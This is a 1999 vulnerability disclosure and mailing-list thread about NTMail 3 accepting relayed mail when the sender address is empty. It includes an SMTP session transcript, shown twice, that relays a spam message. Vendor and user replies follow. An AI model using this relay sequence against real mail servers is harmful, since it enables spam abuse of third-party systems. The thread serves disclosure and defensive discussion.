NTMail version 3 relay problem NTmail3 appears to have a small hole that allows anyone to use an NTmail3 server as a relay mail server. Basically here is how it works. NTmail3 is set to not allow relay (either the TO or FROM address must be local) JUCE (a $500 antispamming add-on from the makers of NTmail) has been installed and used to lock the server down from the spammers. I:>open mail.someisp.net 25 220-Unauthorized Use Prohibited 220 mail.someisp.net WindowsNT SMTP Server v3.03.0017/1.aihl/SP ESMTP ready at Sun, 6 Jun 1999 10:39:30 -0400 helo 250 mail.someisp.net [192.168.0.0] mail from:<> 250 Ok. rcpt to:poorsucker@aol.com 250 Ok. data 354 Start mail input, end with .. buy my crap sincerely, some lame spammer . 250 Requested mail action Ok. So the stupid program appears to think that <> is a local address. Not only that but if you use JUCE (the anti spam addon) and have it set to stop things with max messages (too many messages and the account gets shut down) it will give the postmaster notification when an account hits the max message limit, well <> doesn't cause any notification at all. In fact it appears to be a sort of special case and may actually get around some of the other anti spamming features built into NTmail3. Gordano LTD (the author of NTmail) doesn't appear to care, their response was "we don't support V3 unless you pay", like I was asking a question or something... I've even offered to pay them to build me a fixed version but instead they have asked me to take the discussion elsewhere (instead of their mailing list). Ok, this is elsewhere . Gordano's solution is to upgrade to NTmail 4, which costs oh.. about 4x what you paid for version 3. Also if you purchase version 4 and find it unacceptable because of other problems (I can't run it because it can't handle the load that version 3 handles), Gordano will be more than happy to downgrade you to version 3 (this is how they are trying to retain some new customers who are totally unsatisfied with the quality of Version 4). So since they are still selling Version 3 in effect it is my opinion they should fix the damn thing. Geo. PS, NTMail 3.03 is over a year old and the new version has been out for about 4 months however it's got so many problems we had to revert back to version 3 -------------------------------------------------------------------------------- Date: Tue, 8 Jun 1999 12:07:17 -0400 From: Geo. To: BUGTRAQ@netspace.org Subject: NTMail3 has open relay hole NTMail version 3 has an open relay exploit that allows anyone to send mail thru the server even if it's not local. See http://www.nthelp.com/40/ntmailspam.htm for the details. -------------------------------------------------------------------------------- Date: Tue, 8 Jun 1999 07:24:20 -0400 From: Geo. To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM Subject: NTMail 3 open relay For all those of you still running NTMail version 3.x I:>open mail.someisp.net 25 220-Unauthorized Use Prohibited 220 mail.someisp.net WindowsNT SMTP Server v3.03.0017/1.aihl/SP ESMTP ready at Sun, 6 Jun 1999 10:39:30 -0400 helo 250 mail.someisp.net [192.168.0.0] mail from:<> 250 Ok. rcpt to:poorsucker@aol.com 250 Ok. data 354 Start mail input, end with .. buy my crap sincerely, some lame spammer . 250 Requested mail action Ok. Your servers are an open relay host (anyone can relay mail thru them using <> as the FROM address), JUCE can't stop this, and as far as I can tell there really isn't any good way. ORBS tests for this and will black list your servers if they find it. The solution is to upgrade to NTMail version 4 which doesn't have this particular problem. Geo. -------------------------------------------------------------------------------- Date: Tue, 8 Jun 1999 20:52:40 +0200 From: Peter van Dijk To: BUGTRAQ@netspace.org Subject: Re: NTMail3 has open relay hole On Tue, Jun 08, 1999 at 12:07:17PM -0400, Geo. wrote: > NTMail version 3 has an open relay exploit that allows anyone to send mail > thru the server even if it's not local. > > See http://www.nthelp.com/40/ntmailspam.htm for the details. Note that the <> mentioned here is the empty envelope sender which is required for bounces. Allowing it thru is still kinda stupid tho. A spammer exploiting this doesn't have to care about where his bounces go either :) Greetz, Peter -- | 'He broke my heart, | Peter van Dijk | I broke his neck' | peter@attic.vuurwerk.nl | nognikz - As the sun | Hardbeat@ircnet - #cistron/#linux.nl | | Hardbeat@undernet - #groningen/#kinkfm/#vdh | -------------------------------------------------------------------------------- Date: Thu, 10 Jun 1999 16:39:06 +0100 From: John Stanners To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM Subject: Re: NTMail 3 open relay We have reviewed the posting of "NTMail version 3.x" being an open relay and there are several observations we would like to make: 1. The last version 3 of NTMail is very old version and was superceded by version 4 in August 1998. Version 3.03.0018 is available on our FTP site for no charge for those who wish to update to the latest version 3. It is no longer available for purchase. 2. It is *not* true that NTMail is "an open relay" unless the relay options are changed from their default. 3. More flexibility in the relaying options were introduced in version 4 of NTMail which is available from http://www.ntmail.co.uk or sales@gordano.com. In addition to normal support mechanisms, we welcome feedback of all kinds by e-mail to suggest@gordano.com. Many thanks for allowing us to set the record straight. John Stanners Gordano Ltd -------------------------------------------------------------------------------- Date: Wed, 9 Jun 1999 16:36:40 -0700 From: James Stephens To: BUGTRAQ@netspace.org Subject: Re: NTMail3 has open relay hole At 12:07 PM 6/8/99 -0400, Geo. wrote: >NTMail version 3 has an open relay exploit that allows anyone to send mail >thru the server even if it's not local. > >See http://www.nthelp.com/40/ntmailspam.htm for the details. Well, I tried out that little trick on a more recent version of NTMail 3.03.0006 and it didn't allow the relay. There is basic juce functionality in that version. Regards, James Stephens James@iperform.net Network Administrator 714-254-0200 Internet Performance Fax: 714-254-0600